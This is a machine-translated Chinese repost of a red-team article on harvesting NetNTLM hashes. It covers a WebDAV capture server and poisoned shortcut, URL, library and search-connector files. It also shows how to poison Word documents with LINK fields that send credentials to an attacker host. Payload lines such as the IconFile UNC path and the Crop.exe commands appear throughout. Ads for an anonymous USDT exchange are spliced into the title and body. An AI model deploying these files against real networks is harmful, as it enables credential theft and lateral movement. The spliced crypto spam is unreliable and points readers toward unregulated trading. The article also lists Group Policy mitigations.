快捷搜索:  创意文化园  1864  1957  as  1956  1877  1959  2067

用usdt充值(www.payusdt.vip):红队武器化方式之获取NetNTLM哈希

USDT跑分

U交所(www.payusdt.vip)是使用TRC-20协议的Usdt官方交易所,开放USDT帐号注册、usdt小额交易、usdt线下现金交易、usdt实名不实名交易、usdt场外担保交易的平台。免费提供场外usdt承兑、低价usdt渠道、Usdt提币免手续费、Usdt交易免手续费。U交所开放usdt otc API接口、支付回调等接口。

在红队攻击中,我们一直在寻找用于横向移动和特权提升的创新方式。在我们所处的许多环境中,许多红队常用的经典Active Directory攻击并不能很好地解决,由于我们经常需要与防御者举行斗争。

传统内部渗透测试的最有用计谋之一是通过LLMNR或netbios投毒来网络或中继NetNTLM哈希。这种攻击已获得很好的明晰和普遍使用,其中包罗@ byt3bl33d3r和@ W00Tock提供的大量资源。除了LLMNR / netbios投毒的方式外,NetNTLM哈希的网络不仅异常有用,而且在大型环境中也很难检测到。

虽然从观点上讲这是一条异常壮大的攻击路径,但很少有人能有用地将其武器化用于红队攻击中,在这种情形下,你通常是通过下令和控制通道以低特权用户身份举行操作的。确实,到现在为止,我们知道的大多数实验都需要治理权限和/或已安装驱动程序挟制445上的通讯。先前事情的一些示例包罗:

· https://ijustwannared.team/2017/05/27/responder-and-layer-2-pivots/

· https://diablohorn.com/2018/08/25/remote-ntlm-relaying-through-meterpreter-on-windows-port-445/

· https://pkb1s.github.io/Relay-attacks-via-Cobalt-Strike-beacons/

· https://github.com/Kevin-Robertson/Inveigh

最近,NCC Group公布了Sigwhatever,它在Outlook署名中注入了指向托管图像的链接,从而强制通过HTTP举行身份验证,从而为目的内部鱼叉式网络钓鱼提供了一个有趣的载体。

这项事情在观点上类似于我们在该领域的一些研究,而且已经改变了游戏规则。为了对红队社区做出孝顺,我们将在本文中分享我们的研究。

0x01 获取NetNTLM哈希

为了使远程主机对你举行身份验证(例如,遵照UNC路径的效果),必须知足某些条件。为了最洪水平地削减hash散布到Internet等外部网络的可能性,你的系统必须位于“内陆Intranet”域内。当你已经在目的内部网络上驻足时,知足此要求的最简朴方式是使用系统的NetBIOS名称。就是说,若是你在Workstation1.contoso.com上,则应在UNC路径中使用workstation1将其强制进入内陆Intranet域。

有几种支持身份验证请求的服务,而且正如我们前面已经提到的那样,没有治理员权限,从SMB(445)获取哈希值并非易事,纵然那样,从OpSec的角度来看,这种方式也可能不是理想的。另一种方式是通过滥用WebDAV小型重定向器通过HTTP举行。

漫衍式创作和版本控制(DAV)是HTTP协议的扩展,有助于通过HTTP举行文件共享。Windows使用WebClient服务来实现WebDAV,该服务的目的是通过与Windows应用程序的本机API挪用举行文件交互,它被视为远程文件系统。这样做的利益是,远程HTTP服务器可以在任何端口上运行,从红队的角度来看,它提供了天真性,并允许我们制止处置已经绑定的SMB端口。

可以使用UNC路径来启动与启用了\[email protected] WebDAV的HTTP服务器毗邻。

当对启用了WebDAV的UNC路径触发文件操作时,身份验证主机将执行以下操作:

1.发出OPTIONS方式以发现Web服务器支持的功效,

2.若是支持PROPFIND,则发出PROPFIND请求方式以发现目录结构,

3.若是Web服务器通过401 Unauthorized响应并通过WWW-Authenticate标头请求NTLM身份验证,则WebDAV小型重定向器将继续启动NTLM质询响应身份验证,最终将NetNTLM哈希提供应Web服务器。

身份验证的总体流程可能如下所示:

为了模拟该协议,我们确立了一个简朴的基于.NET的线程HTTP服务器,以使用Farmer工具来处置身份验证请求。Farmer可以在任何端口上运行,并将从任何传入的毗邻中恢复NetNTLM哈希,将它们打印到屏幕上或将它们存储在文件系统上的加密日志文件中。只管此版本当前不支持,但Farmer也可以扩展为执行跨协议中继,例如HTTP到SMB。

固然,要接受传入毗邻,你可能需要绕过可能存在的任何基于主机的防火墙。然则,仔细查看Windows防火墙接见控制列表险些总是通过白名单历程或端口(seatbelt.exe WindowsFirewall)提供时机。@NinjaParanoid还说明晰使用内置白名单URI的一些其他技巧,例如/Temporary_Listen_Addresses/,在绕过你遇到的防火墙限制方面可能会卓有成效。

Farmer可以通过C2通道执行,仅需要传入的WebDav毗邻即可恢复哈希值:

现在,我们已经概述了若何网络哈希的原理,让我们探索一些诱使用户毗邻到Farmer服务器的途径。

0x02 攻击方式

为了最先网络NetNTLM哈希,我们需要强制使用以对Farmer服务器举行身份验证。我们固然可以给他们发送一个网络钓鱼,并实验对其举行社工以单击UNC路径,然则这可能会引起嫌疑。从行业角度来看,若是我们在用户不知情的情形下强制举行身份验证,那将加倍有用。

强制举行身份验证的最著名手艺之一是通过SCF文件。

SCF强制认证背后的方式是通过远程托管的图标举行的,当资源治理器对其举行剖析时,它将导致对UNC路径所指向的位置(在我们的示例中为Farmer WebDAV服务)举行远程认证。思量到这一点,我们提出了以下文件类型的清单,这些清单可能会用于攻击:

· Windows快捷方式(.lnk)

· 网址文件(.url)

· Windows库文件(.library-ms)

· Windows搜索毗邻器(.searchConnector-ms)

让我们更详细地探讨其中的每一个。

Windows 快捷方式

,

USDT场外交易平台

U交所(www.payusdt.vip)是使用TRC-20协议的Usdt官方交易所,开放USDT帐号注册、usdt小额交易、usdt线下现金交易、usdt实名不实名交易、usdt场外担保交易的平台。免费提供场外usdt承兑、低价usdt渠道、Usdt提币免手续费、Usdt交易免手续费。U交所开放usdt otc API接口、支付回调等接口。

,

Windows快捷方式文件自己可以指向UNC路径,但这固然需要用户打开LNK。然则,在LNK文件名堂中有一个称为“ icon location”的字符串值,它指向LNK图标文件的位置。资源治理器凭证HasIconLocation标志自动读取并剖析此值;若是存在,则用户只需打开包罗的文件夹即可强制举行身份验证。

我们可以使用“截图”工具确立一个带有图标位置的LNK,该图标位置指向我们的Farmer WebDAV服务器。

使用LECmd剖析LNK,我们可以验证LNK是否具有HasIconLocation标志,其中图标位置指向WebDAV共享:

现在,任何打开包罗LNK的文件夹的用户都将可以其NetNTLM哈希发送到Farmer服务器。

URL 文件

URL文件是浏览器的快捷方式,可用于打开URL。就像LNK一样,URL文件可以包罗一个图标以显示该文件。通过在路径中指定环境变量来打开包罗文件夹时,可以强制资源治理器从UNC路径中检索图标,例如:

[InternetShortcut]
URL=farmer
WorkingDirectory=farmer
IconFile=\\[email protected]\%USERNAME%.icon
IconIndex=1

裁剪工具可用于确立投毒的URL文件,如下所示:

Crop.exe \\fileserver\common mdsec.url \\[email protected]\mdsec.ico

Windows 库文件

Windows库文件是用户内容的虚拟容器,.library-ms文件可用于指向远程或内陆存储位置。@dtmsecurity以前曾研究过这些文件的使用方式,以及在CIA Vault7泄露中也曾讨论过。

如Vault 7泄露中所说的那样,library-ms文件的SearchConnectorDescription部门可以指向远程位置,这将在打开容器文件夹时再次强制通过资源治理器举行身份验证:

裁剪工具可用于确立投毒的库ms文件,如下所示:

Crop.exe \\fileserver\common mdsec.library-ms \\[email protected]\mdsec

Windows 搜索毗邻器

搜索毗邻器文件用于将用户与存储在远程位置的数据毗邻起来,类似于前面提到的library-ms文件。

搜索毗邻器文件名堂还允许使用图标来自界说毗邻器的显示方式,可以使用iconReferenceXML标签将其托管在远程URI(例如我们的Farmer WebDAV服务器)上:

简朴地打开包罗该.searchConnector-ms文件的文件夹将再次迫使资源治理器举行身份验证。

武器化

为了行使这些文件类型中的每一种,我们确立了一个分外的工具(名为Crop)。Crop通过将投毒文件写入操作员控制的位置(例如网络文件共享)来事情,当用户打开该位置时,资源治理器将实验恢复该文件类型的图标文件并触发身份验证。应该注重的是,用户不需要打开文件,他们只需要打开包罗文件夹以强制举行身份验证即可。为了进一步扩大功效,我们添加了“递归”标志,该标志将在父级中任何可写的子文件夹中事情,并删除投毒的文件。

https://player.vimeo.com/video/515287254

在这种方式中,我们固然会确立种种新文件来强制举行身份验证,固然这可能会引起用户的嫌疑。使这种情形不那么显著的一种方式可能是设置NTFS隐藏属性以从资源治理器中对其举行屏障,这可以在.NET中轻松完成,如下所示:

File.SetAttributes(path, FileAttributes.Hidden);

我们形貌的方式依赖于确立新文件,在某些情形下,这可能是不希望的。或者,我们可能希望毒化现有的常用文件,以便在重新打开它们时可以强制举行身份验证。

企业最常用的文件类型之一是Office文档,而且经常看到这些文件散布在文件共享中。为了投毒Office文档,我们确立了一个名为Fertiliser的附加工具。通过获取现有的Word docx并通过注入指向我们的远程WebDAV共享的新链接字段来投毒它。通过在域代码中设置“ a”指令,我们可以告诉Word在打开文档时自动更新链接域:

当用户打开文档时,将泛起类似以下忠言的提醒:

LINK Excel.Sheet.8 \\[email protected]\mdsec.png \a

然则,无论用户的选择是照样否,NetNTLM哈希仍然会泄露。

让我们看一下现实的攻击效果:

https://player.vimeo.com/video/515287398

固然,可以将其扩展到其他Office文档和文件类型,以扩展操作员可用的选项。

0x03 剖析总结

资源治理器实验加载图标文件时,我们已经纪录的大多数文件类型都强制举行了身份验证。默认情形下,资源治理器设置为在网络文件夹上显示缩略图和图标,然则可以使用“ DisableThumbnailsOnNetworkFolders”和“ DisableThumbnails”组计谋设置禁用此行为。

启用这些设置将阻止资源治理器加载图标文件,从而限制了该手艺的使用局限。然则,它固然不能防止使用链接字段使Office文档投毒。

在许多潜在领域中,可以改善此工具和方式,其中一些仍在我们的研究局限内。

首先,可能尚有其他文件类型,其中一些可能不会因禁用网络共享中的图标加载而受到影响;此外,其他Office文档(例如Excel和PowerPoint文件)无疑容易受到字段链接或类似的远程资源注入的影响,而且是扩展Fertiliser的优越选择。

最后,通过引入跨协议中继(例如从HTTP到SMB或LDAP),可以显着增强该手艺的影响。可在MDSec ActiveBreach github上找到Farmer工具箱的源代码。

本文翻译自:https://www.mdsec.co.uk/2021/02/farming-for-red-teams-harvesting-netntlm/
发表评论
sunbet声明:该文看法仅代表作者自己,与本平台无关。请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
表情:
用户名: 验证码:点击我更换图片

您可能还会对下面的文章感兴趣: